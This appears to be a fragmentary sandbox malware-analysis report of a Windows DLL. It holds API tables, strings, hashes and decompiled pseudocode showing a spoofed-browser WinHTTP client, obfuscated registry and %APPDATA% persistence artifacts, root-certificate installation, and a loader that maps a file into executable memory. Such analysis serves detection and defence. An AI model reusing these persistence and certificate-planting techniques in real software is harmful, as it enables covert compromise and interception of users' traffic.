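The second call in main shows the failure mode worth remembering when reversing the caller: with the read failing on the second chunk, only the first 8 bytes reach the string object, yet the loop exits through the same success path as a complete body.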
Disassembly listing for this function (only the address column survived extraction; the instruction text is not recoverable here): instructions at 0x10021af0 to 0x10021d0b, with an out-of-line block at 0x10022367 to 0x100223e3.
                                                                                                                                                                          0x10021d0d
                                                                                                                                                                          0x10021d11
                                                                                                                                                                          0x10021d1f
                                                                                                                                                                          0x10021d2e
                                                                                                                                                                          0x10021d49
                                                                                                                                                                          0x10021d52
                                                                                                                                                                          0x10021d53
                                                                                                                                                                          0x10021d61
                                                                                                                                                                          0x10021d62
                                                                                                                                                                          0x10021d67
                                                                                                                                                                          0x10021d67
                                                                                                                                                                          0x10021d11
                                                                                                                                                                          0x10021d6a
                                                                                                                                                                          0x10021d7f
                                                                                                                                                                          0x10021d8e
                                                                                                                                                                          0x10021d99
                                                                                                                                                                          0x10021da5
                                                                                                                                                                          0x10021db4
                                                                                                                                                                          0x10021dca
                                                                                                                                                                          0x10021de0
                                                                                                                                                                          0x10021df6
                                                                                                                                                                          0x10021e0c
                                                                                                                                                                          0x10021e16
                                                                                                                                                                          0x10021e62
                                                                                                                                                                          0x10021e62
                                                                                                                                                                          0x10021e66
                                                                                                                                                                          0x10021e78
                                                                                                                                                                          0x10021e7e
                                                                                                                                                                          0x10021e95
                                                                                                                                                                          0x10021eae
                                                                                                                                                                          0x10021ec9
                                                                                                                                                                          0x10021ee3
                                                                                                                                                                          0x10021eef
                                                                                                                                                                          0x10021ef0
                                                                                                                                                                          0x10021ef5
                                                                                                                                                                          0x10021ef5
                                                                                                                                                                          0x10021efb
                                                                                                                                                                          0x10021f01
                                                                                                                                                                          0x10021f08
                                                                                                                                                                          0x10021f28
                                                                                                                                                                          0x10021f0a
                                                                                                                                                                          0x10021f0a
                                                                                                                                                                          0x10021f11
                                                                                                                                                                          0x10021f30
                                                                                                                                                                          0x10021f47
                                                                                                                                                                          0x10021f5b
                                                                                                                                                                          0x10021f74
                                                                                                                                                                          0x10021f8f
                                                                                                                                                                          0x10021f9b
                                                                                                                                                                          0x10021f9c
                                                                                                                                                                          0x10021fa1
                                                                                                                                                                          0x10021fa1
                                                                                                                                                                          0x10021f11
                                                                                                                                                                          0x10021fbc
                                                                                                                                                                          0x10021fc2
                                                                                                                                                                          0x10021fc9
                                                                                                                                                                          0x10021fd0
                                                                                                                                                                          0x10021fd4
                                                                                                                                                                          0x10022002
                                                                                                                                                                          0x10022011
                                                                                                                                                                          0x1002201e
                                                                                                                                                                          0x1002204a
                                                                                                                                                                          0x1002204f
                                                                                                                                                                          0x10022052
                                                                                                                                                                          0x10022052
                                                                                                                                                                          0x10022055
                                                                                                                                                                          0x10022059
                                                                                                                                                                          0x10022069
                                                                                                                                                                          0x1002205b
                                                                                                                                                                          0x1002205e
                                                                                                                                                                          0x1002205e
                                                                                                                                                                          0x1002206f
                                                                                                                                                                          0x10022073
                                                                                                                                                                          0x10022083
                                                                                                                                                                          0x10022075
                                                                                                                                                                          0x10022078
                                                                                                                                                                          0x10022078
                                                                                                                                                                          0x10022089
                                                                                                                                                                          0x1002208d
                                                                                                                                                                          0x1002209d
                                                                                                                                                                          0x1002208f
                                                                                                                                                                          0x10022092
                                                                                                                                                                          0x10022092
                                                                                                                                                                          0x100220be
                                                                                                                                                                          0x100220c2
                                                                                                                                                                          0x100220c8
                                                                                                                                                                          0x100220cb
                                                                                                                                                                          0x100220cf
                                                                                                                                                                          0x10022355
                                                                                                                                                                          0x10022355
                                                                                                                                                                          0x10022359
                                                                                                                                                                          0x1002235e
                                                                                                                                                                          0x1002235f
                                                                                                                                                                          0x10022364
                                                                                                                                                                          0x10022364
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100220d5
                                                                                                                                                                          0x100220db
                                                                                                                                                                          0x100220e1
                                                                                                                                                                          0x100220e4
                                                                                                                                                                          0x100220e8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100220ee
                                                                                                                                                                          0x1002210b
                                                                                                                                                                          0x10022111
                                                                                                                                                                          0x10022117
                                                                                                                                                                          0x1002211a
                                                                                                                                                                          0x10022132
                                                                                                                                                                          0x1002213e
                                                                                                                                                                          0x1002214b
                                                                                                                                                                          0x10022167
                                                                                                                                                                          0x1002216b
                                                                                                                                                                          0x10022171
                                                                                                                                                                          0x10022183
                                                                                                                                                                          0x1002219b
                                                                                                                                                                          0x100221a7
                                                                                                                                                                          0x100221ad
                                                                                                                                                                          0x100221be
                                                                                                                                                                          0x100221c3
                                                                                                                                                                          0x100221d0
                                                                                                                                                                          0x100221db
                                                                                                                                                                          0x100221dc
                                                                                                                                                                          0x100221ea
                                                                                                                                                                          0x100221eb
                                                                                                                                                                          0x100221f0
                                                                                                                                                                          0x100221f0
                                                                                                                                                                          0x100221f3
                                                                                                                                                                          0x100221fd
                                                                                                                                                                          0x10022207
                                                                                                                                                                          0x1002220b
                                                                                                                                                                          0x1002234f
                                                                                                                                                                          0x10022352
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10022211
                                                                                                                                                                          0x10022211
                                                                                                                                                                          0x10022211
                                                                                                                                                                          0x10022222
                                                                                                                                                                          0x10022226
                                                                                                                                                                          0x1002222c
                                                                                                                                                                          0x1002222e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10022249
                                                                                                                                                                          0x10022250
                                                                                                                                                                          0x10022261
                                                                                                                                                                          0x10022266
                                                                                                                                                                          0x10022269
                                                                                                                                                                          0x1002226f
                                                                                                                                                                          0x10022276
                                                                                                                                                                          0x1002229d
                                                                                                                                                                          0x100222a2
                                                                                                                                                                          0x100222b3

APIs
  • Part of subcall function 100211B0: _memset.LIBCMT ref: 100212CB
  • Part of subcall function 100211B0: _strlen.LIBCMT ref: 1002130A
  • Part of subcall function 1001A370: _strlen.LIBCMT ref: 1001A381
  • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
  • Part of subcall function 1001A370: _memset.LIBCMT ref: 1001A3C6
  • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
• _wcscpy_s.LIBCMT ref: 10021BDE
• _wcscpy_s.LIBCMT ref: 10021BF3
• WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
• WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
• WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021C97
• WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021CAF
• WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021CF4
• WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021D49
• WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021D7F
• WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021DB4
• WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021DCA
• WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021DE0
• WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021DF6
• WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021E0C
• WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021E5A
• _memset.LIBCMT ref: 10021E95
• _wcscpy_s.LIBCMT ref: 10021EAE
• _wcscat_s.LIBCMT ref: 10021EC9
• WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10021EE3
• WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10021F28
  • Part of subcall function 10021460: _memset.LIBCMT ref: 100214F6
  • Part of subcall function 10021460: _memset.LIBCMT ref: 10021513
  • Part of subcall function 10021460: _memset.LIBCMT ref: 10021530
  • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021552
  • Part of subcall function 10021460: _sprintf.LIBCMT ref: 1002156C
  • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021598
  • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215AF
  • Part of subcall function 10021460: _strlen.LIBCMT ref: 100215D7
• WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 10021FBC
• _memset.LIBCMT ref: 1002201E
• WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 100220C2
• WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 100220DB
• WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 1002210B
• GetLastError.KERNEL32 ref: 10022111
• _memset.LIBCMT ref: 1002214B
• WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 1002216B
• WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022226
• GetLastError.KERNEL32 ref: 10022230
• _printf.LIBCMT ref: 1002223C
• WinHttpCloseHandle.WINHTTP(00000000), ref: 10022371
• WinHttpCloseHandle.WINHTTP(00000000), ref: 10022381
• WinHttpCloseHandle.WINHTTP(00000000), ref: 10022391
Strings
• Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021DD7
• POST, xrefs: 10021BE8
• A WinHTTP Example Program/1.0, xrefs: 10021C1F
• GET, xrefs: 10021BD3
• WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022237
• Out of memory., xrefs: 10022278
• Content-Type: application/x-www-form-urlencoded, xrefs: 10021F1F
• Content-Type: multipart/form-data; boundary=%ws, xrefs: 10021F68
• WinHttpQueryDataAvailable failed. Error = %d, xrefs: 100222CF
• Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021DED
• upgrade-insecure-requests: 1, xrefs: 10021E03
• Cookie: , xrefs: 10021E9D
• User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021DC1
• P, xrefs: 10021B2E
• HTTP/1.1, xrefs: 10021CE3
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Http$HeadersRequest$_memset$OptionQuery_strlen$CloseHandle_sprintf_wcscpy_s$ByteCharErrorLastMultiOpenWide$AvailableConnectCredentialsDataReceiveResponseSendTimeouts_printf_wcscat_s
• String ID: A WinHTTP Example Program/1.0$Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=%ws$Cookie: $GET$HTTP/1.1$Out of memory.$P$POST$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d$WinHttpQueryDataAvailable failed. Error = %d$upgrade-insecure-requests: 1
• API String ID: 2394362766-3430901228
• Opcode ID: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
• Instruction ID: 00e1b7ec85819600eadfa1f4c4e1cc9d1ca762337438c411615f13f897333fae
• Opcode Fuzzy Hash: b8ee3584adcfd30ec297091367d7441899c7aa05c1a39fbd4c09932605cfc880
• Instruction Fuzzy Hash: 0D4238B5D00218EBEB10CFA4DC85BEEB7B5FB48304F508258F609A7281D779AA84CF51
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __calloc_impl.LIBCMT ref: 00445DDE
• CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004462DC
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00446313
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0044634C
• FindCloseChangeNotification.KERNELBASE(?), ref: 00446365
• VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 004463A2
• RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0044643D
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser__calloc_impl
• String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect$eFileNameA$eNameA
• API String ID: 3477008394-1099821101
• Opcode ID: b3b2b8505b7e6efc5623bb82e1659dffd7832b679be7e926eaac381cd2b512cc
• Instruction ID: 92c00295a1748db035c2a3cc5971eaa4fa31c544e1f1bb5c84cce870d51fbf1a
• Opcode Fuzzy Hash: b3b2b8505b7e6efc5623bb82e1659dffd7832b679be7e926eaac381cd2b512cc
• Instruction Fuzzy Hash: 8012CE70D082E8DAEB21CB64CC58BDEBFB56F16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004462DC
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00446313
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0044634C
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00446365
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 004463A2
                                                                                                                                                                          • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0044643D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                                          • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                                          • API String ID: 4217122820-3199432782
                                                                                                                                                                          • Opcode ID: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                          • Instruction ID: 6cedba83c7d9bafe838ce5be11e1900a1a46eff271120bcd53cc19314cb7e4b2
                                                                                                                                                                          • Opcode Fuzzy Hash: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B12AE70D082E8DAEB21CB64CC58BDEBFB56F16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                          			E1000E90E() {
                                                                                                                                                                          				int _t13;
                                                                                                                                                                          				long _t19;
                                                                                                                                                                          				signed int _t20;
                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                          				void* _t37;
                                                                                                                                                                          				long _t39;
                                                                                                                                                                          				void* _t40;
                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                          				struct _OSVERSIONINFOA* _t49;
                                                                                                                                                                          				void* _t51;
                                                                                                                                                                          
                                                                                                                                                                          				_t37 = GetProcessHeap;
                                                                                                                                                                          				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
                                                                                                                                                                          				if(_t49 != 0) {
                                                                                                                                                                          					_t49->dwOSVersionInfoSize = 0x94;
                                                                                                                                                                          					_t13 = GetVersionExA(_t49);
                                                                                                                                                                          					__eflags = _t13;
                                                                                                                                                                          					_push(_t49);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					if(_t13 != 0) {
                                                                                                                                                                          						 *(_t51 + 0xc) = _t49->dwPlatformId;
                                                                                                                                                                          						 *(_t51 + 0x10) = _t49->dwMajorVersion;
                                                                                                                                                                          						 *(_t51 - 4) = _t49->dwMinorVersion;
                                                                                                                                                                          						_t47 = _t49->dwBuildNumber & 0x00007fff;
                                                                                                                                                                          						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                          						_t19 =  *(_t51 + 0xc);
                                                                                                                                                                          						__eflags = _t19 - 2;
                                                                                                                                                                          						if(_t19 != 2) {
                                                                                                                                                                          							_t47 = _t47 | 0x00008000;
                                                                                                                                                                          							__eflags = _t47;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t39 =  *(_t51 - 4);
                                                                                                                                                                          						 *0x1033347c = _t19;
                                                                                                                                                                          						_t20 =  *(_t51 + 0x10);
                                                                                                                                                                          						_t44 = (_t20 << 8) + _t39;
                                                                                                                                                                          						 *0x10333484 = (_t20 << 8) + _t39;
                                                                                                                                                                          						 *0x10333488 = _t20;
                                                                                                                                                                          						 *0x1033348c = _t39;
                                                                                                                                                                          						 *0x10333480 = _t47;
                                                                                                                                                                          						_t21 = E1000F7BF(1);
                                                                                                                                                                          						__eflags = _t21;
                                                                                                                                                                          						_pop(_t40);
                                                                                                                                                                          						if(_t21 == 0) {
                                                                                                                                                                          							goto L1;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							_t23 = E100133E0(_t37);
                                                                                                                                                                          							__eflags = _t23;
                                                                                                                                                                          							if(_t23 != 0) {
                                                                                                                                                                          								E10015081();
                                                                                                                                                                          								 *0x10336f64 = GetCommandLineA();
                                                                                                                                                                          								 *0x103332fc = E10014F4C(); // executed
                                                                                                                                                                          								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
                                                                                                                                                                          								__eflags = _t27;
                                                                                                                                                                          								if(_t27 >= 0) {
                                                                                                                                                                          									_t28 = E10014E93(_t40);
                                                                                                                                                                          									__eflags = _t28;
                                                                                                                                                                          									if(_t28 < 0) {
                                                                                                                                                                          										L15:
                                                                                                                                                                          										E10014BD4();
                                                                                                                                                                          										goto L10;
                                                                                                                                                                          									} else {
                                                                                                                                                                          										_t32 = E10014C20(_t40, _t44);
                                                                                                                                                                          										__eflags = _t32;
                                                                                                                                                                          										if(_t32 < 0) {
                                                                                                                                                                          											goto L15;
                                                                                                                                                                          										} else {
                                                                                                                                                                          											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
                                                                                                                                                                          											__eflags = _t33;
                                                                                                                                                                          											if(_t33 != 0) {
                                                                                                                                                                          												goto L15;
                                                                                                                                                                          											} else {
                                                                                                                                                                          												 *0x103332f8 =  *0x103332f8 + 1;
                                                                                                                                                                          												_t22 = 1;
                                                                                                                                                                          												__eflags = 1;
                                                                                                                                                                          											}
                                                                                                                                                                          										}
                                                                                                                                                                          									}
                                                                                                                                                                          								} else {
                                                                                                                                                                          									L10:
                                                                                                                                                                          									E100130CA();
                                                                                                                                                                          									goto L8;
                                                                                                                                                                          								}
                                                                                                                                                                          							} else {
                                                                                                                                                                          								L8:
                                                                                                                                                                          								E1000F819();
                                                                                                                                                                          								goto L1;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          					} else {
                                                                                                                                                                          						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                          						goto L1;
                                                                                                                                                                          					}
                                                                                                                                                                          				} else {
                                                                                                                                                                          					L1:
                                                                                                                                                                          					_t22 = 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t22;
                                                                                                                                                                          			}

APIs
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
• String ID:
• API String ID: 2870529951-0
• Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
• Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
• Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
• Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
	char _v267;
	char _v268;
	char _v531;
	char _v532;
	char _v536;
	char _v803;
	char _v804;
	void* _t44;
	void* _t46;
	void* _t48;
	void* _t50;
	void* _t52;
	void* _t54;
	void* _t55;
	void* _t57;
	void* _t94;

	_t94 = __eflags;
	_t77 = __edi;
	_v536 = 0;
	_v532 = 0;
	E1000CF20(__edi,  &_v531, 0, 0x103);
	// 0x1a is CSIDL_APPDATA: both file paths below are built under %APPDATA%
	__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
	E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
	_v804 = 0;
	E1000CF20(_t77,  &_v803, 0, 0x103);
	__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
	E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
	_v268 = 0;
	E1000CF20(_t77,  &_v267, 0, 0x103);
	E1001F990(__ebx, _t77, __esi, _t94,  &_v268); // executed
	// 0x80000002 is HKEY_LOCAL_MACHINE; each registry and file step must succeed
	// for the function to return 1, which makes these paths and keys useful host artifacts
	_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
	_t95 = _t44;
	if(_t44 != 0) {
		_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
		_t96 = _t46;
		if(_t46 != 0) {
			_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8); // executed
			_t97 = _t48;
			if(_t48 != 0) {
				_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
				_t98 = _t50;
				if(_t50 != 0) {
					_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
					_t99 = _t52;
					if(_t52 != 0) {
						_t54 = E1001F5F0(_a4, _t99,  &_v804, _a4, _a8); // executed
						if(_t54 != 0) {
							_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8); // executed
							_t101 = _t55;
							if(_t55 != 0) {
								_t57 = E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
								if(_t57 != 0) {
									_v536 = 1;
								}
							}
						}
					}
				}
			}
		}
	}
	return _v536;
}

APIs
• _memset.LIBCMT ref: 1001FA58
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
• _strcat_s.LIBCMT ref: 1001FA84
• _memset.LIBCMT ref: 1001FAA1
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
• _strcat_s.LIBCMT ref: 1001FACD
• _memset.LIBCMT ref: 1001FAEA
  • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
  • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
  • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
  • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
  • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
  • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
  • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
  • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
  • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
  • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
Strings
• \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
• SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
• SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
• \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
• SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
• SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
• String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
• API String ID: 475603772-4188859120
• Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
• Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
• Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
• Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
Uniqueness
• Uniqueness Score: -1.00%

